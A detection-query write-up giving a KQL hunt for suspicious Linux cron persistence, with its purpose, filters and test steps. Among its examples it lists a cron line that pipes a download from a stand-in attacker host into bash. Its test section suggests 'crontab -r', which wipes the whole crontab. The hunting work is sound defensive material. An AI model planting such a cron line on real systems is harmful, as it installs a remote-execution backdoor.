Query Details
Linux Suspicious Cron Persistence
Query
## Linux – Suspicious Cron Persistence – Last 7d
### Query name
**`Linux – Suspicious cron persistence – last 7d`**
### Purpose
Identifies **cron files created or modified by non‑package‑management processes**, which is a strong indicator of:
* Manual persistence
* Script‑based backdoors
* Red team activity
* Post‑exploitation footholds
The query intentionally filters out expected system behaviour (such as `apt` or `dpkg`) to reduce noise.
---
### Query
```kql
let LinuxDeviceIds =
DeviceInfo
| where OSPlatform == "Linux"
| distinct DeviceId;
DeviceFileEvents
| where DeviceId in (LinuxDeviceIds)
| where Timestamp > ago(7d)
| where FolderPath has_any ("/etc/cron", "/var/spool/cron")
| where InitiatingProcessFileName !in (
"dpkg",
"apt",
"apt-get",
"yum",
"dnf"
)
| project
Timestamp,
DeviceName,
ActionType,
FileName,
FolderPath,
InitiatingProcessFileName,
InitiatingProcessCommandLine
| order by Timestamp desc
```
---
### Why this query works well on Linux
Linux attackers rarely invent exotic persistence mechanisms. Instead, they rely on **simple, durable techniques** such as:
* Adding cron jobs
* Modifying existing scheduled tasks
* Dropping scripts that cron executes
By excluding package managers, this query focuses on **human‑ or script‑driven changes**, which dramatically improves signal quality.
---
### Typical malicious or suspicious activity this will surface
* Cron jobs created using `bash`, `sh`, or scripting tools
* Scheduled execution of payloads in `/tmp` or home directories
* Red team persistence mechanisms
* Backdoors that periodically beacon or re‑establish access
Examples include:
* `* * * * * curl http://attacker | bash`
* Hidden cron entries created by shell scripts
* Persistence established immediately after SSH access
---
### Expected benign activity (and why it’s filtered)
Common benign cron changes are usually made by:
* `dpkg`
* `apt` / `apt-get`
* `yum` / `dnf`
These typically occur during:
* Package installation
* System updates
* Maintenance tasks
By excluding these processes, the query avoids alerting on normal OS maintenance.
---
### When to use this query
Use this query when:
* Investigating suspected Linux compromise
* Validating persistence after red team activity
* Hunting for low‑and‑slow backdoors
* Reviewing post‑exploitation behaviour
It is especially effective on **servers**, where cron changes should be rare and intentional.
---
### Testing and validation guidance
To safely test this query, you can create a temporary cron entry:
```bash
(crontab -l 2>/dev/null; echo "* * * * * echo cron-test >> /tmp/cron-test.log") | crontab -
```
After confirming the event appears in Advanced Hunting, remove the cron job:
```bash
crontab -r
```
Explanation
This query is designed to detect suspicious cron job activities on Linux systems over the past seven days. It specifically looks for cron files that have been created or modified by processes other than common package management tools like apt, dpkg, yum, or dnf. These package managers are typically responsible for legitimate system updates and maintenance, so excluding them helps focus on potentially malicious activities.
The query identifies activities such as:
- Manual persistence efforts
- Script-based backdoors
- Red team activities
- Post-exploitation footholds
By filtering out expected system behavior, the query aims to highlight human- or script-driven changes, which are often indicative of malicious intent. Examples of suspicious activities include cron jobs created by shell scripts, scheduled execution of payloads, or hidden cron entries.
This query is particularly useful when investigating potential Linux compromises, validating persistence mechanisms after red team exercises, or hunting for subtle backdoors. It is most effective on servers, where cron changes should be rare and deliberate.
To test the query, you can create a temporary cron job and verify its detection, then remove it afterward.
Details
Nathan Hutchinson
Released: February 2, 2026
Tables
Keywords
Operators